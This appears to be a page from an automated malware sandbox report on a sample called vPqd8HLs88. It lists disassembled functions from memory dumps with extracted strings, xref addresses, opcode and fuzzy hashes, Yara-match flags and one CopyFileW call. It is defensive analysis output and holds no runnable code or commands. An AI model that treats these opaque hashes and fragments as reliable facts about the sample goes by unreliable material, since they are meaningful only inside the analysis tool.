Download Yara Rule

Strings

IEND, xrefs: 004046D1
), xrefs: 0040435B

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 4b11f0427a8d39e7f4ee21428c6dcedd1539bd0bf162f4913477910bccb130ad
Instruction ID: 0153b4d3b548ecd6a6b4d3c8a2036607e78b04b12dcbea6cbb27936a2d619856
Opcode Fuzzy Hash: 4b11f0427a8d39e7f4ee21428c6dcedd1539bd0bf162f4913477910bccb130ad
Instruction Fuzzy Hash: 77D1BFB16083449FD710CF14D845B5BBBE4ABD4308F14492EFA99AB3C2D779D908CB9A

Function 00954547 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 00954938
), xrefs: 009545C2

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: aa74a17f4dbac3ab2a9e15463e0f52df8341742832f961fabdff76c876c732c3
Instruction ID: dc8d5ae4a5f2c94447b6eebc901778330cce520618adc7649c1609a4192420d9
Opcode Fuzzy Hash: aa74a17f4dbac3ab2a9e15463e0f52df8341742832f961fabdff76c876c732c3
Instruction Fuzzy Hash: 40D1DEB1A08344AFD760CF19C841B5BBBE4AF94309F14892DFD989B381D775E948CB82

Function 0042BF1D Relevance: 2.8, Strings: 2, Instructions: 304COMMON

Download Yara Rule

Strings

mnTP, xrefs: 0042C0EC
^P, xrefs: 0042C213

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: mnTP$^P
API String ID: 0-4261586994
Opcode ID: 6c13e93dd1faa14a77f8d28027c5c854ad0f77d2dfb4fc15d311b2be2602a57b
Instruction ID: 1dd869945a53d02bdba6fe0eac20b34157f8238e68884e744b5e0783b284d15a
Opcode Fuzzy Hash: 6c13e93dd1faa14a77f8d28027c5c854ad0f77d2dfb4fc15d311b2be2602a57b
Instruction Fuzzy Hash: 6081D171205B418FD725CF39C891766BBE2BF9A304B18859ED4D68B793C738E806CB54

Function 0097C184 Relevance: 2.8, Strings: 2, Instructions: 304COMMON

Download Yara Rule

Strings

mnTP, xrefs: 0097C353
^P, xrefs: 0097C47A

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: mnTP$^P
API String ID: 0-4261586994
Opcode ID: cd957a9dd950e5614f0e0905ac1f94fde1f7f98911dfae7950a75de1a88df5bd
Instruction ID: 1e6d4bfc6eabf2d114a4f46e376d08c014578494bcdccd85e5da021df59c8a0a
Opcode Fuzzy Hash: cd957a9dd950e5614f0e0905ac1f94fde1f7f98911dfae7950a75de1a88df5bd
Instruction Fuzzy Hash: 2A81B4712057418FD725CF39C890B62BBE2BF96314B18C59DD4EA8B792D739E806CB50

Function 0042BF9C Relevance: 2.8, Strings: 2, Instructions: 283COMMON

Download Yara Rule

Strings

mnTP, xrefs: 0042C0EC
^P, xrefs: 0042C213

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: mnTP$^P
API String ID: 0-4261586994
Opcode ID: 43aa26eb8403dcfcdc5ce52f076909275dba46297b80da5abd18985221456ea4
Instruction ID: 7def9da14c2a93856457756a282834e12fc7cccaeaf1489d56583180b4928342
Opcode Fuzzy Hash: 43aa26eb8403dcfcdc5ce52f076909275dba46297b80da5abd18985221456ea4
Instruction Fuzzy Hash: 8281E071605B418FD729CF39C890723FBE2AF9A304B19C59ED4D68B792C678E806CB54

Function 0097C203 Relevance: 2.8, Strings: 2, Instructions: 283COMMON

Download Yara Rule

Strings

mnTP, xrefs: 0097C353
^P, xrefs: 0097C47A

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: mnTP$^P
API String ID: 0-4261586994
Opcode ID: 91b8667385c6759153816db195a2fb85aa7cf6089114535c4df86d3a0a4be1f5
Instruction ID: 46356f9b137589fd5e0434f6d50a9137514c6ee52e5145dd2d8f989d849c4164
Opcode Fuzzy Hash: 91b8667385c6759153816db195a2fb85aa7cf6089114535c4df86d3a0a4be1f5
Instruction Fuzzy Hash: 8281D6716057418FD729CF39C890722FBE2AF9A314B19C59DD4EA8B7A2C775E806CB10

Function 00416152 Relevance: 2.8, Strings: 2, Instructions: 257COMMON

Download Yara Rule

Strings

IJ, xrefs: 0041621C
gfff, xrefs: 004162BA

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: IJ$gfff
API String ID: 0-2879405950
Opcode ID: 42293c99c9d335acaa787b398dfec62ea283276db262b0875003eee6cc6f587a
Instruction ID: 13fbb475582efd389b0e1fe4cbd9cf5b7c8b56cff3322eac5d7f1d01ec1997cb
Opcode Fuzzy Hash: 42293c99c9d335acaa787b398dfec62ea283276db262b0875003eee6cc6f587a
Instruction Fuzzy Hash: 35711672B542114BC324CF28CC427AB76D6ABC9314F09863ED889DB396D778D94687C9

Function 009663B9 Relevance: 2.8, Strings: 2, Instructions: 257COMMON

Download Yara Rule

Strings

IJ, xrefs: 00966483
gfff, xrefs: 00966521

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: IJ$gfff
API String ID: 0-2879405950
Opcode ID: 68fcbacf441555df0acc5db73a6eed30f6b393c545d6c8028aa9aba136cadc43
Instruction ID: 41b682c120c0d9a113d1b15af2c86d224fb962bd73f17e5b6ff1e6126f463df0
Opcode Fuzzy Hash: 68fcbacf441555df0acc5db73a6eed30f6b393c545d6c8028aa9aba136cadc43
Instruction Fuzzy Hash: B07104B2A042514BD324CF69CC827AB76D6EBC9314F09863DD889DB395DB78E906C781

Function 0096D275 Relevance: 2.7, Strings: 2, Instructions: 205COMMON

Download Yara Rule

Strings

rI, xrefs: 0096D396
[\, xrefs: 0096D448

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: [\$rI
API String ID: 0-3327430303
Opcode ID: 020db8cc1935b647c78ff23a333c99a805be3ad55de34f09ac5bc5c7ccb579f6
Instruction ID: 7db878c407d6b45bcb637f2d0053cb51cc6ee9ef12016aaef6d808e67e345166
Opcode Fuzzy Hash: 020db8cc1935b647c78ff23a333c99a805be3ad55de34f09ac5bc5c7ccb579f6
Instruction Fuzzy Hash: DA6199B2A0C3419BD304DF658811A5FFBE2EFD1714F088D6CF0D54B256D63ACA099B96

Function 00415649 Relevance: 2.7, Strings: 2, Instructions: 166COMMON

Download Yara Rule

Strings

1-52, xrefs: 00415803
9%=:, xrefs: 004157ED

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: 1-52$9%=:
API String ID: 0-635023363
Opcode ID: 09ef8aa47ce46ab7cbd770f081732be167d7510c73d563fa99f8f2d20a95aada
Instruction ID: 80949dadd14b750abfbaaa2f3e5796204c6587049f77796d9417155e8e780057
Opcode Fuzzy Hash: 09ef8aa47ce46ab7cbd770f081732be167d7510c73d563fa99f8f2d20a95aada
Instruction Fuzzy Hash: C05137B9A09341CBE7309F24EC86BDFB7D1FB85308F08493DE59887292D7389505875A

Function 00977097 Relevance: 2.6, Strings: 2, Instructions: 109COMMON

Download Yara Rule

Strings

st, xrefs: 009778E5
?0@y, xrefs: 009778EF

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: ?0@y$st
API String ID: 0-3855076123
Opcode ID: 55919d7029db8820b8244f2a50727a2827b3f0d310494412798a7cb9c58cfd04
Instruction ID: 0f3f1845a6221fe593555241bb7e552b8708cf09114ae565f3a5a20bb2c35d26
Opcode Fuzzy Hash: 55919d7029db8820b8244f2a50727a2827b3f0d310494412798a7cb9c58cfd04
Instruction Fuzzy Hash: 1C41D1B5A0C3808BC728DF25C9527AFBEE6FBC2304F14986CD1C99B255DA358505CB5B

Function 00416DF8 Relevance: 2.4, Strings: 1, Instructions: 1168COMMON

Download Yara Rule

Strings

y, xrefs: 00417917

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: InitializeThunk
String ID: y
API String ID: 2994545307-4225443349
Opcode ID: afea5ebdfd3c903316d424fd9a0d10a8b7afa0cdbfe41f546bb1147ddb38dbd0
Instruction ID: 3f94822c54d2a309a0bae535589520cefad76859f6647abd138ebd4f61dd5f14
Opcode Fuzzy Hash: afea5ebdfd3c903316d424fd9a0d10a8b7afa0cdbfe41f546bb1147ddb38dbd0
Instruction Fuzzy Hash: 89623676A483408BC720CF69CC817ABB7E2EBCA314F29463ED5D9C7391DB7898468745

Function 00429940 Relevance: 2.1, Strings: 1, Instructions: 827COMMON

Download Yara Rule

Strings

#&2*, xrefs: 0042A151

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: #&2*
API String ID: 0-2580052025
Opcode ID: e8efa6df978268fed168d8904598d80638d8e94846cfd79724baaaba841377fe
Instruction ID: 3c1f283b8b7ba0daa85251326d452beed871793d90e54090f4f80c323f89be1d
Opcode Fuzzy Hash: e8efa6df978268fed168d8904598d80638d8e94846cfd79724baaaba841377fe
Instruction Fuzzy Hash: 534221757083908BD7148F29E88176BB7E1EBCA304F588A3DE89587392D738DC05CB5A

Function 0043A300 Relevance: 2.0, Strings: 1, Instructions: 736COMMON

Download Yara Rule

Strings

f, xrefs: 0043A575

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 8141a73a3c6f5e7671a0d24b942d9de3b73c8d1f87e08f91ed6527a2766aa114
Instruction ID: c5895f5a1225713e4be3f824d0c184b824eed9ad20f275d0302f61e4634b7589
Opcode Fuzzy Hash: 8141a73a3c6f5e7671a0d24b942d9de3b73c8d1f87e08f91ed6527a2766aa114
Instruction Fuzzy Hash: BF2216316483118FD314CF29C881B2BB7E2ABC9314F299A2EE4D587392D774DC168B97

Function 0098A567 Relevance: 2.0, Strings: 1, Instructions: 736COMMON

Download Yara Rule

Strings

f, xrefs: 0098A7DC

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: f
API String ID: 0-1993550816
Opcode ID: 145d0c87cd4269aff8ee87b72926dafd3ef8ec72c040e2777a76e9e38e5593b4
Instruction ID: 37b710016f9d9bb3d271d710159cc159ad476a3228991400c7c6735f657b1317
Opcode Fuzzy Hash: 145d0c87cd4269aff8ee87b72926dafd3ef8ec72c040e2777a76e9e38e5593b4
Instruction Fuzzy Hash: 1D2228316093418FE714DF29C840B2BB7E6ABC9314F298A3EE49587392D775DC06CB92

Function 0041498C Relevance: 1.9, Strings: 1, Instructions: 660COMMON

Download Yara Rule

Strings

gMA, xrefs: 00414D52

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: gMA
API String ID: 0-4141171961
Opcode ID: 33c3978b3c515b05e2664525f579a993be14264ec9828d38bdfa812b8e808c6d
Instruction ID: 7ed22c41b2b902de01ba3d89eb0afe22531aec8a725bbd8400c1d6405f1c41ed
Opcode Fuzzy Hash: 33c3978b3c515b05e2664525f579a993be14264ec9828d38bdfa812b8e808c6d
Instruction Fuzzy Hash: B3026979208304DFD714AF29ED02BAB77A1EBCA314F28453DF58183392E7799D418B89

Function 0042332F Relevance: 1.8, Strings: 1, Instructions: 554COMMON

Download Yara Rule

Strings

27B, xrefs: 00423716

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: 27B
API String ID: 0-3497748580
Opcode ID: 766a1a36a0f2ad694e3622f2ceb109f21036b37efcd3a2fa8ce3cdcc52626c17
Instruction ID: 0633142c69849dd16e020829722f31e231108d8f5aab11b28a041870a773e858
Opcode Fuzzy Hash: 766a1a36a0f2ad694e3622f2ceb109f21036b37efcd3a2fa8ce3cdcc52626c17
Instruction Fuzzy Hash: 70F10176608311DFC714CF28EC8166A73E1EB8A716F598A7DE89197391D738AA01CB84

Function 0042576B Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

kXB, xrefs: 00425786

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: kXB
API String ID: 0-1366493747
Opcode ID: 837a806f469f48c4fc5240d0766a935de1c4d864888b80e6955c0cc0977a0a25
Instruction ID: e2474d337541c831b06913755704da77413ba70772d64fce1efa7e9584cda676
Opcode Fuzzy Hash: 837a806f469f48c4fc5240d0766a935de1c4d864888b80e6955c0cc0977a0a25
Instruction Fuzzy Hash: 2EF11375A00616CBCB24CF64D4916BFB3B2FF89350FA9816EC482AB364D7389D42CB54

Function 009668B9 Relevance: 1.7, Strings: 1, Instructions: 484COMMON

Download Yara Rule

Strings

GEW, xrefs: 009668DC

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: GEW
API String ID: 0-646702372
Opcode ID: 809eb200281ac54a43ffbf5e61fd3ac9f317471f6af0386304317eb10c8c3727
Instruction ID: 3daea5a625039cb2b8a282e040b41b296c6e9e85f6b34ea444af708d9298f50e
Opcode Fuzzy Hash: 809eb200281ac54a43ffbf5e61fd3ac9f317471f6af0386304317eb10c8c3727
Instruction Fuzzy Hash: 21F167B01083908BE7348F24C4617ABBBE0FF92308F149A5DD5C95F391E3BA8906CB56

Function 00438089 Relevance: 1.7, Strings: 1, Instructions: 424COMMON

Download Yara Rule

Strings

xy, xrefs: 0043830E

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: xy
API String ID: 0-2414225561
Opcode ID: e13f55cb485dc48fdea8ee4030eba812e565fd8427798f1b0b0708b68adf4a6b
Instruction ID: fc34ca27b4206ed0a510f0337f4e7b76a65a61094a81d3279fb893246519fafe
Opcode Fuzzy Hash: e13f55cb485dc48fdea8ee4030eba812e565fd8427798f1b0b0708b68adf4a6b
Instruction Fuzzy Hash: 42D1F53A618351CBCB189F24E85126BB3F1FF4A741F4BC87DD8424B2A4E73A8958C746

Function 00422C50 Relevance: 1.7, Strings: 1, Instructions: 420COMMON

Download Yara Rule

Strings

MN, xrefs: 00422C7C

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: MN
API String ID: 0-2506772256
Opcode ID: d3589ab51b6cb8ed780f4aae0c75a1141a10d424fe67ba8afe90138b2c8006ca
Instruction ID: a2df185f56ea5ac14bd94646a1b3db0f35a61754290066c9a419cf59740ba31b
Opcode Fuzzy Hash: d3589ab51b6cb8ed780f4aae0c75a1141a10d424fe67ba8afe90138b2c8006ca
Instruction Fuzzy Hash: 2CB14871A043206BD724DF24D95267BB3F1EF81324F4A852EF88597382E378D905C79A

Function 00972EB7 Relevance: 1.7, Strings: 1, Instructions: 420COMMON

Download Yara Rule

Strings

MN, xrefs: 00972EE3

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: MN
API String ID: 0-2506772256
Opcode ID: 943bba55a70740fe07d49aee82d239e7e3c42db4cd7fb5b1fcdcc400fc19f6e1
Instruction ID: e41a321207c461c5e67072e8a4a595a3bfbabf706681e0abd628fadab6e5db80
Opcode Fuzzy Hash: 943bba55a70740fe07d49aee82d239e7e3c42db4cd7fb5b1fcdcc400fc19f6e1
Instruction Fuzzy Hash: B4B13A726083109BD724DF28C892A7BB3F5EF91710F19C92CE89997281E735EE04D792

Function 0042ACB0 Relevance: 1.7, Strings: 1, Instructions: 411COMMON

Download Yara Rule

Strings

", xrefs: 0042AF98

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 54a9fcce638e25bfa637b080298c89dd30ab75eb8f4464f2cd9cf19577032b45
Instruction ID: 25e1e62e830ec0bd94d26b646812ac619c3b74d8d5c24a63f665a15afad4abb1
Opcode Fuzzy Hash: 54a9fcce638e25bfa637b080298c89dd30ab75eb8f4464f2cd9cf19577032b45
Instruction Fuzzy Hash: 0CC133B2B083205FD7158E25E45076BB7E6AF84350F49892EE8958B382E73CDC5587CA

Function 0097AF17 Relevance: 1.7, Strings: 1, Instructions: 411COMMON

Download Yara Rule

Strings

", xrefs: 0097B1FF

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 0406b252fb5e2e052edb644e1e846d66c7086a0261585dc79e9f2cc4c109518e
Instruction ID: 91317cb4302f38efc5f16197a85d3a94b752b92c0a14e6fb609b6f7c12fa0826
Opcode Fuzzy Hash: 0406b252fb5e2e052edb644e1e846d66c7086a0261585dc79e9f2cc4c109518e
Instruction Fuzzy Hash: CAC1C2B3A093449BD7158E24C491B6FB7E9AFD5310F18C92DE99D8B381E734DC448792

Function 00415D8A Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

@FGX, xrefs: 00415E33

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: @FGX
API String ID: 0-349140567
Opcode ID: dfed3ae3f666e5bb430498b6c805b31fcdc209bc64c600a506940a71a66dda79
Instruction ID: e0e2b40c9fa1c3d72baba6ed1b97abea9726b9189fb08b3537722b91034629ba
Opcode Fuzzy Hash: dfed3ae3f666e5bb430498b6c805b31fcdc209bc64c600a506940a71a66dda79
Instruction Fuzzy Hash: D7C126B6A087408FD714CF29D8916EBB7D3ABC9314F19893EE0D9C7391DB3899468706

Function 0042786E Relevance: 1.6, Strings: 1, Instructions: 355COMMON

Download Yara Rule

Strings

iyB, xrefs: 00427A25, 00427AED

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: iyB
API String ID: 0-3731409854
Opcode ID: d23674705536995fea9dd3774d724572ee8c49edb3a86add01f63b8ee90c7888
Instruction ID: 5eb112381df64a5e4ca9ad0d44e225ecdcd5d1f1bb51caf5e21dfac7720f3d1f
Opcode Fuzzy Hash: d23674705536995fea9dd3774d724572ee8c49edb3a86add01f63b8ee90c7888
Instruction Fuzzy Hash: 94C13675A0C3A1DFD7148F28EC4172E77A2BF8A324F59867DE49597291C338AD01CB89

Function 00428A93 Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

jkl, xrefs: 00428B64

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: jkl
API String ID: 0-2886914207
Opcode ID: 2a9478bbf09f617318cc5a399560ab6bd20e0b7b52417e9a77f7643182a71df8
Instruction ID: 6a2f4df5ba6bf608835fa52a795e9295fcc36086fc6b18e99f3f7a21e25fb5c9
Opcode Fuzzy Hash: 2a9478bbf09f617318cc5a399560ab6bd20e0b7b52417e9a77f7643182a71df8
Instruction Fuzzy Hash: F7B121B5A10225CFCB15CF28E81139EB7B1FF85314F15C26ED465AB7A1EB34A852CB84

Function 0096D54A Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

!", xrefs: 0096D5DA

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: !"
API String ID: 0-405161720
Opcode ID: d2a51c5b92ea9fdc1ca9e4f1cf50c2b9e363c661226de77798c754062468324d
Instruction ID: ade2da6902fa39317396fa48932633199bd41a0455d95517d16b7c577de77ef5
Opcode Fuzzy Hash: d2a51c5b92ea9fdc1ca9e4f1cf50c2b9e363c661226de77798c754062468324d
Instruction Fuzzy Hash: AC8111B1A093118BC714DF68C8927ABB7F1EF95314F14892CE8E58B3A1E778D905C792

Function 0042D180 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

6% , xrefs: 0042D349

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: 6%
API String ID: 0-792795933
Opcode ID: f50ef03090cfa4eec7d2a47babf97f820abafbd7aca9b2b3e1a7174087a90865
Instruction ID: ae5b86585769adcec2c0648a65074736a64153604f355b1e8decb3ed54b0c552
Opcode Fuzzy Hash: f50ef03090cfa4eec7d2a47babf97f820abafbd7aca9b2b3e1a7174087a90865
Instruction Fuzzy Hash: 73A14971A047528BE315CF2AD890322FBA2BF87315F68C19DC4E68B356CA39E447C759

Function 0097D3E7 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

6% , xrefs: 0097D5B0

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: 6%
API String ID: 0-792795933
Opcode ID: f50ef03090cfa4eec7d2a47babf97f820abafbd7aca9b2b3e1a7174087a90865
Instruction ID: 8a961f1e1e9d6af805637998fc143c40acc549d6150073bfb4b72a02883926ab
Opcode Fuzzy Hash: f50ef03090cfa4eec7d2a47babf97f820abafbd7aca9b2b3e1a7174087a90865
Instruction Fuzzy Hash: 6FA128726057828BD315CF2AC490722FBB2AF96314F28C59CD0EA8B796CB36E447C754

Function 009788C2 Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,00000000), ref: 0097896D

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: f1ce64e7a86c89c2947ff0882281fc0832879d245c02af3123d1f08526ff5d61
Instruction ID: 123aa3a65b87c6a40ed7835fe4008bdb4996f68e7ac52bafdec89ddc008f0601
Opcode Fuzzy Hash: f1ce64e7a86c89c2947ff0882281fc0832879d245c02af3123d1f08526ff5d61
Instruction Fuzzy Hash: F111E1B56883809AD3359F24E40276BBAB5FB82304F10592DE1DA5B642CA758010CB57

Function 0042D214 Relevance: 1.5, Strings: 1, Instructions: 292COMMON

Download Yara Rule

Strings

6% , xrefs: 0042D349

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: 6%
API String ID: 0-792795933
Opcode ID: a57b15cb396e978207a6a081702f83d7da98b756c268d8ca131259ddfcff5628
